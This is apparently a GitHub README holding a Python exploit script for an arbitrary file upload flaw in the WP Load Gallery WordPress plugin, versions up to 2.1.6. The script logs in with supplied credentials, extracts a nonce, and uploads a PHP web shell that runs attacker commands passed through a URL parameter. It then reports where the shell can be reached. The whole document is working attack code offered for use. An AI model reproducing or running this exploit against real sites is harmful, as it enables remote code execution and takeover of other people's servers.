README.md
Rendering markdown...
import requests
import re
import argparse
# by Nxploit | Khaled_alenazi
banner = r"""
_______ ________ ___ ___ ___ _____ ___ ____ ___ _ _ ___
/ ____\ \ / / ____| |__ \ / _ \__ \| ____| |__ \|___ \ / _ \| || |__ \
| | \ \ / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
| | \ \/ / | __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__ _/ /
| |____ \ / | |____ / /_| |_| / /_ ___) | / /_ ___) | / / | |/ /_
\_____| \/ |______| |____|\___/____|____/ |____|____/ /_/ |_|____|
"""
print(banner)
requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False
parser = argparse.ArgumentParser(description="Exploit WP Load Gallery - Arbitrary File Upload")
parser.add_argument("-u", "--url", help="Target WordPress URL (e.g., https://example.com)", required=True)
parser.add_argument("-un", "--username", help="WordPress Username", required=True)
parser.add_argument("-p", "--password", help="WordPress Password", required=True)
args = parser.parse_args()
url = args.url.rstrip('/')
login_url = f"{url}/wp-login.php"
gallery_url = f"{url}/wp-admin/admin.php?page=wp-load-gallery"
ajax_url = f"{url}/wp-admin/admin-ajax.php"
shell_filename = "nxploit.php"
shell_path = f"{url}/wp-content/uploads/2025/02/{shell_filename}"
shell_content = "<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>"
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"
version_url = f"{url}/wp-content/plugins/wp-load-gallery/readme.txt"
print("[+] Checking plugin version...")
version_response = session.get(version_url, headers={"User-Agent": user_agent})
if version_response.status_code == 200:
version_match = re.search(r'Stable tag:\s*(\d+\.\d+\.\d+)', version_response.text)
if version_match:
version = version_match.group(1)
print(f"[+] Detected version: {version}")
if version <= "2.1.6":
print("[+] The target is vulnerable! Proceeding with exploitation...")
else:
print("[!] The target is not vulnerable. Exiting.")
exit()
else:
print("[!] Could not determine plugin version. Proceeding with caution.")
else:
print("[!] Failed to fetch plugin version. Proceeding with caution.")
login_data = {
"log": args.username,
"pwd": args.password,
"rememberme": "forever",
"wp-submit": "Log+In"
}
response = session.post(login_url, verify=False, data=login_data, headers={"User-Agent": user_agent})
if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
print("[+] Logged in successfully.")
else:
print("[!] Failed to log in.")
exit()
print("[+] Extracting wplg_nonce...")
response = session.get(gallery_url, headers={"User-Agent": user_agent})
wplg_nonce_match = re.search(r'"wplg_nonce"\s*value="(\w+)"', response.text)
if not wplg_nonce_match:
print("[!] Failed to extract wplg_nonce.")
exit()
wplg_nonce = wplg_nonce_match.group(1)
print(f"[+] Extracted wplg_nonce: {wplg_nonce}")
files = {
"wplg_gallery_file[]": (shell_filename, shell_content, "image/jpeg")
}
data = {
"wplg_nonce": wplg_nonce,
"action": "wpgallery",
"wplg_gallery_id": "205",
"task": "wplg_upload"
}
print("[+] Uploading shell...")
response = session.post(ajax_url, files=files, data=data, headers={"User-Agent": user_agent})
if response.status_code == 200 and "status" in response.text:
print("[+] File uploaded successfully!")
print(f"[+] Checking shell at: {shell_path}")
shell_check = session.get(shell_path, headers={"User-Agent": user_agent})
if shell_check.status_code == 200:
print(f"[+] Shell is accessible at: {shell_path}?cmd=id")
else:
print("[!] Shell upload may have failed, check manually.")
else:
print("[!] Upload failed, check the response manually.")